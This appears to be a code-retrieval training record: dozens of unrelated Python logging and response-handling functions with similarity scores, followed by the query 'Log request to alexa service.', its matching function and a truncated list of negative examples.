attach_request_log(response):\n allure.attach(\n dump.dump_all(response).decode(\"utf-8\"),\n name=\"Full request log\",\n extension=\"txt\",\n )", "def after_request(response):\n # This avoids the duplication of registry in the log,\n # since that 500 is already logged via @app.errorhandler.\n if response.status_code != 500:\n ts = strftime('[%Y-%b-%d %H:%M]')\n message = '{0} {1} {2} {3} {4} {5}'.format(\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n response.status)\n print(message)\n return response", "def on_saga_success(self):\n\n logger.info(f'Saga {self.saga_id} succeeded')", "def handle_response(self, lvap):\n\n lvaps = RUNTIME.tenants[self.tenant_id].lvaps\n\n if lvap.addr not in lvaps:\n return\n\n self.handle_callback(lvap)", "def on_response(self, response):\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'RESPONSE MESSAGE RECEIVED %s %s',\n repr(self),\n response,\n )\n\n self.response_queue.put(response)", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000, event.action_information\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(ProceduralEventLogging)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_ACTION, handle)]\n )\n\n ae.add_requested_context(ProceduralEventLogging)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_action(\n ds, 1, ProceduralEventLogging, \"1.2.840.10008.5.1.1.40.1\"\n )\n assert status.Status == 0x0000\n assert ds.PatientName == \"Test^test\"\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def log(self):\n resp = requests.get(\"%s/api/log\"%self.urlbase, verify=False)\n return resp.json[\"log\"]", "def record_response(self, result: str) -> None:\n self.finish_time = datetime.now()\n self.elapsed_time = (self.finish_time - self.start_time).total_seconds()\n self.result = result\n if not self.failed_when_contains:\n self.failed = False\n elif not any(err in result for err in self.failed_when_contains):\n self.failed = False", "def handle_acsserver_response(self,message,conn):\n response=ResponseClientHandle.switch_msg_stream_type_str2dict(message)\n \n msg_type=response.get(event.KEY_MESSAGE)\n msg_group = int(msg_type) & 0xFF00\n \n #特殊处理AGENT 构建的给ACS的TIMOUT消息响应\n if self.msg_type == event.EV_RPC_AGENT_TIMEOUT_POST:\n if msg_type == event.EV_RPC_AGENT_TIMEOUT_RSP:\n log.debug_info(\"ACS server's response check agent timeout rpc request suc\")\n else:\n log.debug_info(\"ACS server's response check agent timeout rpc request fail\")\n \n return\n \n #检查消息的合法性\n #response message type error\n if not self.handle_response_message_type_verify(msg_group,msg_type,response):\n #check EV_RPC_CHECK_FAIL response\n if (msg_type==event.EV_RPC_CHECK_FAIL):\n\n tmp_obj = response.get(event.KEY_OBJECT)\n strio = StringIO(tmp_obj)\n tmp_msg_key_obj = pickle.load(strio)\n \n if not (isinstance(tmp_msg_key_obj,event.MsgUserRpcCheck)):\n err_info = \"ACS server's rpc response message type error\"\n log.debug_info(err_info)\n\n else:\n tmp_response_dict_ret=tmp_msg_key_obj.dict_ret\n if \"str_result\" in tmp_response_dict_ret:\n rc_str_result = tmp_response_dict_ret.get(\"str_result\")\n err_info = \"ACS server's rpc response check message fail, str_result: \" + rc_str_result\n log.debug_info(err_info)\n \n else:\n err_info = \"ACS server's rpc response message not found dict_ret data\"\n log.debug_info(err_info)\n \n else:\n err_info = \"ACS server's rpc response message type error\"\n log.debug_info(err_info)\n \n ResponseClientHandle.handle_except(self.msg,self.conn,err_info)\n return\n \n #response rpc post\n if (msg_group == event.EVENT_QUERY_GROUP or\n msg_group == event.EVENT_CONFIGURE_GROUP ): \n \n # send response to user or ACS\n ResponseClientHandle.handle_send_response(response,conn)\n \n elif (msg_group == event.EVENT_RPC_GROUP):\n \n if not DUTqueue.WAIT_RPC_RESPONSE_POST_FALG:\n # send response to user or ACS\n ResponseClientHandle.handle_send_response(response,conn)\n else:\n self.set_rpc_request_ACSServer_check_response(\"request_suc\")\n \n #response worklist build/bind/reserve/start/finish info post\n elif (msg_group == event.EVENT_WORKLIST_GROUP):\n\n self.handle_ACS_worklist_info_response(response,conn)\n \n else:\n err_info = \"Unsupport msg event group:%d\" % msg_group\n log.debug_info(err_info)\n ResponseClientHandle.handle_except(self.msg,self.conn,err_info)", "async def _analog_mapping_response(self, data):\n self.query_reply_data[PrivateConstants.ANALOG_MAPPING_RESPONSE] = \\\n data[1:-1]", "async def _analog_mapping_response(self, data):\n self.query_reply_data[PrivateConstants.ANALOG_MAPPING_RESPONSE] = \\\n data[1:-1]", "def log_AD_results(xp_path, learner):\n\n log_file = \"{}/log.txt\".format(xp_path)\n log = open(log_file, \"a\")\n\n log.write(\"Results\\n\\n\")\n\n log.write(\"Train AUC: {} %\\n\".format(round(learner.diag['train']['auc'][-1]*100, 4)))\n log.write(\"Train accuracy: {} %\\n\".format(round(learner.diag['train']['acc'][-1], 4)))\n log.write(\"Train time: {}\\n\\n\".format(round(learner.train_time, 4)))\n\n log.write(\"Val AUC: {} %\\n\".format(round(learner.diag['val']['auc'][-1] * 100, 4)))\n log.write(\"Val accuracy: {} %\\n\\n\".format(round(learner.diag['val']['acc'][-1], 4)))\n\n log.write(\"Test AUC: {} %\\n\".format(round(learner.diag['test']['auc'][-1]*100, 4)))\n log.write(\"Test accuracy: {} %\\n\".format(round(learner.diag['test']['acc'][-1], 4)))\n log.write(\"Test time: {}\\n\".format(round(learner.test_time, 4)))\n\n log.write(\"\\n\\n\")\n log.close()", "def callback(response):\n error_msg = None\n if response.status_code >= 300 and response.status_code < 500:\n resp = response.json()\n if response.status_code == 401 and resp.get(\"message\") == \"Authentication Error\":\n raise AuthenticationError()\n\n msg = resp.get('messages') or resp.get('message')\n details = resp.get('details')\n error_msg = u\"ReaQta Error: \\n status code: {0}\\n message: {1}\\n details: {2}\".format(\n response.status_code,\n msg,\n details)\n\n return response, error_msg", "def logOutput(self, line):\r\n self.writeToLog('output', line)", "def _kantara_log_assertion_id(self, saml_response, ticket):\n printed = False\n try:\n parser = DefusedElementTree.DefusedXMLParser()\n xml = DefusedElementTree.XML(str(saml_response), parser)\n\n # For debugging, it is very useful to get the full SAML response pretty-printed in the logfile directly\n self.logger.debug(\"Created AuthNResponse :\\n\\n{!s}\\n\\n\".format(DefusedElementTree.tostring(xml)))\n printed = True\n\n attrs = xml.attrib\n assertion = xml.find('{urn:oasis:names:tc:SAML:2.0:assertion}Assertion')\n self.logger.info(\n '{!s}: id={!s}, in_response_to={!s}, assertion_id={!s}'.format(\n ticket.key, attrs['ID'], attrs['InResponseTo'], assertion.get('ID')\n )\n )\n\n return DefusedElementTree.tostring(xml)\n except Exception as exc:\n self.logger.debug(\"Could not parse message as XML: {!r}\".format(exc))\n if not printed:\n # Fall back to logging the whole response\n self.logger.info(\"{!s}: authn response: {!s}\".format(ticket.key, saml_response))", "def respond(self, response):\n self.response = response", "def log(msg):\n\tfrom http_request import req\n\tif not req: return\n\t\t\n\tif not req.out.get('_log'):\n\t\treq.out['_log'] = []\n\treq.out['_log'].append(msg)", "def apiai_response(query, session_id):\n\trequest = ai.text_request()\n\trequest.lang='en'\n\trequest.session_id=session_id\n\trequest.query = query\n\tresponse = request.getresponse()\n\treturn json.loads(response.read().decode('utf8'))", "def log():\n data = {}\n log = {}\n log['dia'] = date.today().strftime(\"%d/%m/%Y\")\n log['info'] = ('Rooms IP: %s %s %s')%(request.remote_addr,request.method, request.url)\n data['data'] = log\n try:\n r = requests.post(uri, json=data)\n except requests.exceptions.RequestException as e:\n print(e)\n print(\"\\n\\nThe microservice Log is unvailable. The Log is %s.\"%(log['info']))\n else:\n if r.status_code == 200:\n print(\"Register Log was a success\")\n else:\n print(\"Register Log was an unsuccess\")", "def getLog():\n with open(webapp.config['LOGFILE'], 'r') as logfile:\n output = logfile.read()\n if request.headers['Accept'] == 'application/json':\n return output, 200\n else:\n return render_template(\"output.html\", output=output)", "def getLog(self):\n \n return self.resp[\"log\"]", "def __send_response(self, response):\n logger.debug(' >>> %s', binascii.b2a_qp(response[0]))\n self.request.send(struct.pack('!I', len(response)))\n self.request.send(response)", "def get_server_logs(self):\n self.response.content\n binary_body = re.split('--==.*==', self.response.content)[2].split('\\r\\n')[5]\n\n f = StringIO.StringIO()\n f.write(bytearray(binary_body))\n\n memory_zip = ZipFile(f)\n zip_content = {name: memory_zip.read(name) for name in memory_zip.namelist()}\n oracc_log = zip_content['oracc.log']\n request_log = zip_content['request.log']\n\n # Check if server returns a lemmatised file\n autolem = None \n for key, value in zip_content.iteritems():\n if key.endswith(\"autolem.atf\"):\n autolem = value\n\n print zip_content.keys()\n print \"@\"*30\n print oracc_log\n print \"@\"*30\n print request_log\n print \"@\"*30\n if autolem:\n print autolem\n print \"@\"*30\n\n return oracc_log, request_log, autolem", "def log(self, message):", "def emit(self, record):\n data = getattr(record, 'synchrolog', {})\n if not data:\n return\n\n url = data.pop('url', None)\n\n if not url:\n return\n\n headers = {'Authorization': f'Basic {self.access_token}'}\n response = requests.post(url=url, json=data, headers=headers)\n if response.status_code >= 400:\n print('Could not send logging info to synchrolog server\\n\\n', response.text)", "def verif_response(response):\n if response.status_code >= 200 and response.status_code <= 299:\n logging.debug(\"response server OK::{}\".format(response.text))\n return True\n\n logging.error(\"response server KO::{}\".format(response.text))\n return False", "def test_get_authentication_log_v1(self):\n response = self.client_list.get_authentication_log(api_version=1)[0]\n uri, args = response[\"uri\"].split(\"?\")\n\n self.assertEqual(response[\"method\"], \"GET\")\n self.assertEqual(uri, \"/admin/v1/logs/authentication\")\n self.assertEqual(util.params_to_dict(args)[\"account_id\"], [self.client_list.account_id])", "def parse_aunit_response(aunit_results_xml):\n\n xml_handler = AUnitResponseHandler()\n xml.sax.parseString(aunit_results_xml, xml_handler)\n\n return xml_handler", "def logResult(self, tcid, result):\n record = logging.LogRecord(None, None, None, None, \"TEST COMPLETED - ID: %s w/ STATUS: %s\", (tcid, result),\n None)\n handlers = self.logger.handlers\n for handler in handlers:\n handler.emit(record)", "def response(service, ip, port, response, user=None, status_code=None):\n\n timestamp = format_time(get_time())\n coordinates = get_coordinates(ip)\n\n if not user:\n user = PLACEHOLDER_STRING\n if not status_code:\n status_code = PLACEHOLDER_STRING\n\n values = defaultdict(lambda: PLACEHOLDER_STRING,\n {'event_type': 'response',\n '@timestamp': timestamp,\n 'service': service,\n 'ip': ip,\n 'port': port,\n 'user': user,\n 'response': response,\n 'request_type': status_code,\n 'honeypotID': ID})\n \n if coordinates:\n values['coordinates'] = '{:.4f},{:.4f}'.format(coordinates[0], coordinates[1])\n\n if Config.use_broker:\n BrokerEndpoint.BrokerEndpoint.sendLogs(json.dumps(values))\n\n if coordinates:\n values['lat'] = '{:.4f}'.format(coordinates[0])\n values['lon'] = '{:.4f}'.format(coordinates[1])\n\n message = ('{@timestamp} - [RESPONSE] - {service}, {ip}:{port}, Lat: {lat}, Lon: {lon}, '\n '{response}, {user}, {request_type}').format_map(values)\n _log_alert(message)", "def log_handler(event):\n try:\n if not event.get('isError') or 'failure' not in event:\n return\n\n err = event['failure']\n\n # Don't report Rollbar internal errors to ourselves\n if issubclass(err.type, ApiException):\n log.error('Rollbar internal error: %s', err.value)\n else:\n report_exc_info((err.type, err.value, err.getTracebackObject()))\n except:\n log.exception('Error while reporting to Rollbar')", "def after_request(response):\n # This avoids the duplication of registry in the log,\n # since that 500 is already logged via @app.errorhandler.\n if response.status_code != 500:\n ts = strftime('[%Y-%b-%d %H:%M]')\n logger.error('%s %s %s %s %s %s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n response.status)\n return response", "def LogData(\n serverName: str, pubIp: str, apiName: str, result,\n request: dict):\n log_id = str(uuid.uuid4())\n dateTime = str(datetime.today())\n if \"Image\" in request:\n request['Image'] = str(request['Image'])\n if \"File\" in request:\n request['File'] = str(request['File'])\n\n paramData = json.dumps(request)\n errorInfo = sys.exc_info()\n errorMessage = \"\"\n if errorInfo[2] is not None:\n errorMessage = f'Error at lineNumber: {str(errorInfo[2].tb_lineno)} {str(errorInfo[0])} {str(errorInfo[1])}'\n info = {\n \"log_Id\": log_id, \"ServerName\": serverName, \"DateTime\": dateTime,\n \"PublicIP\": pubIp, \"APIName\": apiName,\n \"Result\": errorMessage + str(result), \"ParameterData\": str(paramData)\n\n }\n logger = logging.getLogger(__name__)\n logger.info(f'{info}')\n return log_id", "def get_response(self):\n result = self.get_response_impl()\n if self.log_dest is not None:\n is_error, response = result\n if is_error:\n response = \"? \" + response\n else:\n response = \"= \" + response\n self._log(\"<< \", response.rstrip())\n return result", "def process_response(response):\n # Print it and exit with 1 if operation wasn't successful\n print(response['message'])\n if response['status'] != 'success':\n sys.exit(1)", "def log(self, api, msg, level):\n return succeed(log.msg(msg, logLevel=level))", "async def _response_handler(self):", "def emit(self, record):\n data = self.mapLogRecord(record)\n client = Client()\n if self.method == 'GET':\n response = client.get(self.url, data)\n else:\n response = client.post(self.url, data)\n self.testcase.assertEqual(response.status_code, 200)\n self.testcase.assertContains(response, 'message saved')", "def on_response(self, response):\n pass", "def log_info(self, line):\n logging.info(\"Telemetry Logger - %s\" % line)", "def _log_request(self):\n log = self.server.log\n if log:\n if hasattr(log, \"info\"):\n log.info(self.format_request() + '\\n')\n else:\n log.write(self.format_request() + '\\n')", "def log(self,):\n if self.request.user.is_anonymous():\n self.fail()\n else:\n self.success()\n if conf.LOGIN_GUARD_FREQUENCY_ALERT_ON:\n self.alert()", "def print_response(response):\n print(f\"Response for {url}\")\n if response.status_code == 200:\n # Green text\n print(f\"\\033[1;32;40m {response.status_code} {response.reason}\\033[1;37;40m\")\n else:\n # Red text\n print(f\"\\033[1;31;40m {response.status_code} {response.reason}\\033[1;37;40m\")\n # print(response.json())\n print(f\" {response.elapsed.total_seconds()} seconds elapsed.\")", "async def handle_log(self, log):\n\t\tself.logger.log(log.level, str(log))", "def get_intent_response(date_start_slot,date_end_slot):\n print(\"here\",date_start_slot,date_end_slot) \n if date_start_slot != 'NA' and date_end_slot != 'NA':\n speechOutput = re.sub(' +',' ','Parsing error Logs from '+ date_start_slot + ' to '+date_end_slot)\n\n elif date_start_slot == 'NA' and date_end_slot != 'NA':\n speechOutput = 'Parsing error logs at '+date_end_slot\n\n elif date_start_slot != 'NA' and date_end_slot == 'NA':\n speechOutput = 'Parsing error logs at '+date_start_slot\n\n else:\n speechOutput = 'Start and end times are unrecognizable'\n \n return_value = parseLogs(date_start_slot,date_end_slot,dataframe)\n logs = return_value[0]\n stats = return_value[1]\n \n with open('logs.txt','w') as f:\n for each in logs:\n f.write(str(each))\n\n with open('log_stats.txt','w') as f:\n with open('log_numbers.txt','w') as f_new:\n for each_key,each_value in stats.items():\n f.write(\"Time : \"+str(each_key)+'\\t'+\"Number of logs : \"+str(len(each_value))+\"\\n\\n\")\n f_new.write(\"Time : \"+str(each_key)+'\\t'+\"Number of logs : \"+str(len(each_value))+\"\\n\\n\")\n for each_logs in each_value:\n f.write(each_logs+\"\\n\")\n f.write(\"\\n\\n\\n\\n\")\n\n os.system(\"nohup python send_mail.py &\")\n \n return response(speech_response(speechOutput, True))", "def on_trading_rsp_error(self, p_api, rsp_info, b_is_last):\n self._do_log({\n \"p_api\": p_api,\n \"rsp_info\": rsp_info,\n \"b_is_last\": b_is_last\n })", "def output(self, response: str):\n\n # Try to output through the prefered medium, but revert to\n # backup if need to and log any errors found, for example:\n # logging.error(\"Problem!\")\n\n IO.stdout(response)", "def event_handler(self, response):\n pass", "def _info(self, func):\n self.logger.info(\"llamando a %s\" % func)", "def decorator(fn):\n @functools.wraps(fn)\n def result(*args, **kwargs):\n request_time = datetime.datetime.now()\n actual_response = fn(*args, **kwargs)\n request = bottle.request\n response = bottle.response\n # modify this to log exactly what you need:\n logger.info('%s %s %s %s %s', request.remote_addr,\n request_time,\n request.method,\n request.url,\n response.status)\n logger.info('Cookies: %s', request.get_cookie('login'))\n logger.info('Handeled by: \"%s\" in file: \"%s\"', fn.__name__, SCRIPT_NAME)\n\n return actual_response\n return result", "def on_x(self):\r\n self.log()", "def dump_response_if_enabled(self, ecosystem, component, version, response):\n if self._dump_json_responses:\n try:\n self.dump_analysis(ecosystem, component, version, response.json())\n except Exception:\n self.print_error_response(response, \"error\")\n # not need to fail there - we'll fail later properly", "def handle_response(self, callback):\n\n self.log.info(\"Received callback for subscription %s\", self.service_id)\n self.log.info(callback)\n\n # handle callbacks\n self.handle_callbacks()", "def echo_handler(request):\n logger.debug('')\n return Response(200, 'OK', request.headers, request.body)", "def call_asr():\n\ttic = time.time()\n\treq = flask.request.data.decode(\"utf-8\")\n\taudio_arr = flask.json.loads(req)[\"data\"]\n\twav = np.array(audio_arr, np.float32)\n\t# normalize ([-1:1] normalization)\n\twav = normalize_audio(wav, method=\"-1_1\")\n\t# reduce noise (comment it to make ASR a bit faster)\n\twav = reduce_noise(wav, method=\"wiener\")\n\t# write the recorded audio (for debugging reasons)\n\t# wavfile.write(filename=\"recorded.wav\", rate=16000, data=wav)\n\t# transcribe the provided data\n\tout = asr_model.transcribe(wav)\n\ttoc = time.time()\n\tapp.logger.info(\"ASR Model Transcription: \"+out)\n\tapp.logger.info(\"ASR Duration: {} seconds\".format(toc-tic))\n\t# form response\n\tflask_response= app.response_class(response=flask.json.dumps({\"text\": out}),\n\t\t\t\t\t\t\t\t\t\tstatus=200,\n\t\t\t\t\t\t\t\t\t\tmimetype='application/json' )\n\treturn flask_response", "def log_bad_request_details(r):\n logger.info(\"Response status code: \" + str(r.status_code))\n logger.info(\"Response Details: \" + json.dumps(r.json()))\n logger.info(\"History: \" + str(r.history))\n logger.info(\"Cookies: \" + str(requests.utils.dict_from_cookiejar(r.cookies)))\n logger.info(\"URL: \" + str(r.url))\n logger.info(\"Links: \" + str(r.links))", "def log (self, bytes):\r\n if self.channel.addr:\r\n host = self.channel.addr[0]\r\n port = self.channel.addr[1]\r\n else:\r\n host = 'localhost'\r\n port = 0\r\n self.channel.server.logger.log (\r\n host,\r\n '%d - - [%s] \"%s\" %d %d\\n' % (\r\n port,\r\n self.log_date_string (time.time()),\r\n self.request,\r\n self.reply_code,\r\n bytes\r\n )\r\n )", "def main_response(self, data):", "def main_response(self, data):", "def _response_handler_callback(response):\n response_data = json.loads(response)\n if ('status' in response_data and response_data['status'] != 1) or ('status' not in response_data):\n Mixpanel.LOGGER.warning(\"Bad API response: \" + response)\n raise RuntimeError('Import or Update Failed')\n Mixpanel.LOGGER.debug(\"API Response: \" + response)", "def handle_login(self, request):\n self._verify_headers(request)\n self._verify_auth_parameters(request, check_session=False)\n data = self.responses['login']\n mlid = tags.uint32_tag('mlid', data.session)\n mlog = tags.container_tag('mlog', mlid)\n return web.Response(body=mlog, status=data.status)" ]
[ "0.6283806", "0.6229867", "0.60874593", "0.6051032", "0.6027314", "0.5980479", "0.5956262", "0.5953968", "0.5945938", "0.5923983", "0.57441443", "0.5655665", "0.5653018", "0.56518316", "0.5630625", "0.5618453", "0.5608918", "0.56035566", "0.55921704", "0.55480033", "0.5538451", "0.55379206", "0.5486825", "0.54689276", "0.54341245", "0.54104465", "0.5408528", "0.5402587", "0.53780717", "0.53780717", "0.53780717", "0.5376413", "0.5350587", "0.5332801", "0.5319971", "0.5319541", "0.5311664", "0.5304631", "0.52992135", "0.52818173", "0.52418476", "0.5219804", "0.5192488", "0.5174138", "0.51585615", "0.51438946", "0.5141974", "0.5141974", "0.51338667", "0.51324284", "0.51209444", "0.5115978", "0.5100702", "0.5082812", "0.508037", "0.5078187", "0.50750715", "0.5072481", "0.5071268", "0.5065299", "0.5048431", "0.5039845", "0.50358194", "0.5034273", "0.5027864", "0.50251675", "0.50229955", "0.50162995", "0.5011618", "0.501092", "0.5006098", "0.49976557", "0.49810588", "0.49671328", "0.49616092", "0.49556303", "0.49370673", "0.49340916", "0.49245846", "0.49216938", "0.49138254", "0.49104822", "0.4903079", "0.48958236", "0.48850498", "0.48796466", "0.48750958", "0.48696756", "0.48663345", "0.486125", "0.48592085", "0.48587832", "0.48451856", "0.48434722", "0.48357224", "0.48357224", "0.4832897", "0.48309457" ]
0.7056861
2
Log request to alexa service.
def log_request(handler_input): # type: (HandlerInput) -> None print("Alexa Request: {}\n".format(handler_input.request_envelope.request))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _log_request(self):\n log = self.server.log\n if log:\n if hasattr(log, \"info\"):\n log.info(self.format_request() + '\\n')\n else:\n log.write(self.format_request() + '\\n')", "def _log_request(res: SpamResult) -> None:\n _log.info(f\"requestId=[{request.id}] result=[{res.label}] reason=[{res.reason}]\")", "def onRequestStart(self, api, request):\n logging.info('Request start ({})'.format(request))", "def on_a(self):\r\n self.log()", "def __call__(self, request):\n request.start_time = time.time()\n\n response = self.get_response(request)\n\n log_data = self.extract_log_info(request=request, response=response)\n logger.info(log_data)\n\n return response", "def log_request(task_request, request):\n msg = \"{0.method} {0.url}: {0.body}\".format(request)\n log_info(task_request, msg)", "def log_request(self, r):\n\n token = r.headers.get(self.header, None)\n r.token = token\n self.requests.append(r)\n if r.token:\n self.log.debug('[%s] %s', token or '/', r.url)", "def log(msg):\n\tfrom http_request import req\n\tif not req: return\n\t\t\n\tif not req.out.get('_log'):\n\t\treq.out['_log'] = []\n\treq.out['_log'].append(msg)", "def attach_request_log(response):\n allure.attach(\n dump.dump_all(response).decode(\"utf-8\"),\n name=\"Full request log\",\n extension=\"txt\",\n )", "def add_logger(log, request):\n request.cls.log = log", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n msg = self.make_access_message(resp, req, environ, request_time)\n try:\n self.access_log.info(msg)\n except:\n self.error(traceback.format_exc())", "def log(self):\n\n\t\theader_dict = dict(request.headers)\n\n\t\ttry:\n\t\t\ttracker_id = header_dict[\"tracker_id\"]\n\t\texcept Exception:\n\t\t\ttracker_id = None\n\t\t\n\t\ttry:\n\t\t\tuser_agent = header_dict[\"User-Agent\"]\n\t\texcept Exception:\n\t\t\tuser_agent = None\n\n\t\ttry:\n\t\t\tlanguage = header_dict[\"Accept-Language\"]\n\t\texcept Exception:\n\t\t\tlanguage = None\n\n\t\ttry:\n\t\t\treferer = header_dict[\"Referer\"]\n\t\texcept Exception:\n\t\t\treferer = None\n\n\t\ttry:\n\t\t\torigin = header_dict[\"Origin\"]\n\t\texcept Exception:\n\t\t\torigin = None\n\n\t\ttry:\n\t\t\tjson_data = request.json\n\t\texcept Exception:\n\t\t\tjson_data = None\n\n\t\ttry:\n\t\t\tplatform = request.user_agent.platform.title()\n\t\texcept Exception:\n\t\t\tplatform = None\n\n\t\ttry:\n\t\t\tbrowser = request.user_agent.browser.title()\n\t\texcept Exception:\n\t\t\tbrowser = None\n\n\t\ttry:\n\t\t\tauth_header_token = header_dict[\"Authorization\"].split(\" \")[1]\n\t\texcept Exception:\n\t\t\tauth_header_token = None\n\t\t\n\t\t## If set to run before a request: This is the default setting\n\t\tif self.pre_request:\n\t\t\t@self.app.before_request()\n\t\t\tdef run():\n\t\t\t\t## If the path accessed is in the do_not_log list, it is skipped\n\t\t\t\tif request.path in self.do_not_log:\n\t\t\t\t\treturn\n\t\t\t\t## If the path accessed is not in the do_not_log list, it is posted\n\t\t\t\telse:\n\t\t\t\t\tpost_data = {\n\t\t\t\t\t\t\"error\": None,\n\t\t\t\t\t\t\"stack_trace\": None,\n\t\t\t\t\t\t\"method\": request.method,\n\t\t\t\t\t\t\"source_ip\": request.remote_addr,\n\t\t\t\t\t\t\"url\": request.url,\n\t\t\t\t\t\t\"status_code\": 200, ## Assumed to be 200 due to the nature of the function\n\t\t\t\t\t\t\"headers\": str(header_dict),\n\t\t\t\t\t\t\"user_agent\": user_agent,\n\t\t\t\t\t\t\"language\": language,\n\t\t\t\t\t\t\"platform\": platform,\n\t\t\t\t\t\t\"browser\": browser,\n\t\t\t\t\t\t\"referer\": referer,\n\t\t\t\t\t\t\"origin\": origin,\n\t\t\t\t\t\t\"auth_header\": auth_header_token,\n\t\t\t\t\t\t\"access_time\": datetime.now().strftime(\"%A, %d %B %Y %H:%M:%S\"),\n\t\t\t\t\t\t\"logging_access_key\": self.accessKey,\n\t\t\t\t\t\t\"json\": json_data,\n\t\t\t\t\t\t\"request_params\": str(dict(request.args))\n\t\t\t\t\t}\n\n\t\t\t\t\tself.startPost(post_data)\n\n\t\t\t\t\treturn\n\n\t\t\treturn run\n\t\t\n\t\t## If set to as a wrapper to a function\n\t\telse:\n\t\t\tdef log_decorator(func):\n\n\t\t\t\t@wraps(func)\n\t\t\t\tdef execute(*args, **kwargs):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tresult = func(*args, **kwargs)\n\n\t\t\t\t\t\tresult_response = make_response(result)\n\n\t\t\t\t\t\tpost_data = {\n\t\t\t\t\t\t\t\"error\": None,\n\t\t\t\t\t\t\t\"stack_trace\": None,\n\t\t\t\t\t\t\t\"method\": request.method,\n\t\t\t\t\t\t\t\"source_ip\": request.remote_addr,\n\t\t\t\t\t\t\t\"url\": request.url,\n\t\t\t\t\t\t\t\"status_code\": result_response.status_code,\n\t\t\t\t\t\t\t\"headers\": str(header_dict),\n\t\t\t\t\t\t\t\"user_agent\": user_agent,\n\t\t\t\t\t\t\t\"language\": language,\n\t\t\t\t\t\t\t\"platform\": platform,\n\t\t\t\t\t\t\t\"browser\": browser,\n\t\t\t\t\t\t\t\"referer\": referer,\n\t\t\t\t\t\t\t\"origin\": origin,\n\t\t\t\t\t\t\t\"auth_header\": auth_header_token,\n\t\t\t\t\t\t\t\"access_time\": datetime.now().strftime(\"%A, %d %B %Y %H:%M:%S\"),\n\t\t\t\t\t\t\t\"logging_access_key\": self.accessKey,\n\t\t\t\t\t\t\t\"json\": json_data,\n\t\t\t\t\t\t\t\"request_params\": str(dict(request.args))\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tself.startPost(post_data)\n\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tresult = func(*args, **kwargs)\n\t\t\t\t\t\t\n\t\t\t\t\t\ttrace = traceback.format_exc()\n\n\t\t\t\t\t\tkwargs = {\n\t\t\t\t\t\t\t\"trace\": trace,\n\t\t\t\t\t\t\t\"exception\": str(e)\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t\tpost_data = {\n\t\t\t\t\t\t\t\"error\": str(e),\n\t\t\t\t\t\t\t\"stack_trace\": trace,\n\t\t\t\t\t\t\t\"method\": request.method,\n\t\t\t\t\t\t\t\"source_ip\": request.remote_addr,\n\t\t\t\t\t\t\t\"url\": request.url,\n\t\t\t\t\t\t\t\"status_code\": 500,\n\t\t\t\t\t\t\t\"headers\": str(header_dict),\n\t\t\t\t\t\t\t\"user_agent\": user_agent,\n\t\t\t\t\t\t\t\"language\": language,\n\t\t\t\t\t\t\t\"platform\": platform,\n\t\t\t\t\t\t\t\"browser\": browser,\n\t\t\t\t\t\t\t\"referer\": referer,\n\t\t\t\t\t\t\t\"origin\": origin,\n\t\t\t\t\t\t\t\"auth_header\": auth_header_token,\n\t\t\t\t\t\t\t\"access_time\": datetime.now().strftime(\"%A, %d %B %Y %H:%M:%S\"),\n\t\t\t\t\t\t\t\"logging_access_key\": self.accessKey,\n\t\t\t\t\t\t\t\"json\": json_data,\n\t\t\t\t\t\t\t\"request_params\": str(dict(request.args))\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tself.startPost(post_data)\n\t\t\t\t\t\n\t\t\t\t\treturn result\n\t\t\t\t\n\t\t\t\treturn execute\n\t\t\t\n\t\t\treturn log_decorator", "def log_request(self, code='-', size='-'):\n response_time = self.request_time()\n if hasattr(code, 'value'):\n code = code.value\n self.log_message(\n '\"%s\" %s %s %.2fms',\n self.requestline, str(code), str(size), response_time,\n )\n logger.debug(\n \"method=%s url=%s status=%s handler=%s\"\n \" response_time=%s service=web\",\n self.http_method, self.log_data['url'], code,\n self.log_data['handler'], response_time,\n )", "def log_request(self, code='-', size='-'):\n pass", "def log_request(self, code='-', size='-'):\n if self.server.log_requests:\n BaseHTTPServer.BaseHTTPRequestHandler.log_request(self, code, size)", "def log_request(self, code='-', size='-'):\n print self._heading(\"HTTP Request\")\n #First, print the resource identifier and desired operation.\n print self.raw_requestline,\n #Second, print the request metadata\n for header, value in self.headers.items(): \n print header + \":\", value", "def log_request_response(task_request, response):\n log_request(task_request, response.request)\n log_response(task_request, response)", "def log(self, client_addr, request):\n with codecs.open(self.log_path, \"a\", 'UTF-8') as fh_out:\n print >> fh_out, (time.strftime('%Y-%m-%d %H:%M:%S') + \"\\t\" +\n ':'.join([str(i) for i in client_addr]) + \"\\t\" +\n request)", "def api_access_logging(\n request,\n endpoint,\n user_input,\n http_response_code,\n custom_error_code,\n api_version\n):\n aal = ApiAccessLog()\n\n aal.date = timezone.now()\n aal.url = request.get_full_path()\n aal.user = request.user\n aal.endpoint = endpoint\n aal.user_input = user_input\n aal.http_response_code = http_response_code\n aal.custom_error_code = custom_error_code\n aal.api_version = api_version\n\n try:\n ip = request.META['REMOTE_ADDR']\n aal.ip = ip\n except KeyError:\n pass\n\n try:\n referer = request.META['HTTP_REFERER']\n aal.referer = referer\n except KeyError:\n pass\n\n try:\n user_agent = request.META['HTTP_USER_AGENT']\n aal.user_agent = user_agent\n except KeyError:\n pass\n\n try:\n remote_host = request.META['REMOTE_HOST']\n aal.remote_host = remote_host\n except KeyError:\n pass\n\n try:\n remote_user = request.META['REMOTE_USER']\n aal.remote_user = remote_user\n except KeyError:\n pass\n\n aal.save()", "def log(self, request, response, time):\n try:\n fmt_info = self.colorize_atoms(\n self._format_line(request, response, time)\n )\n\n values = 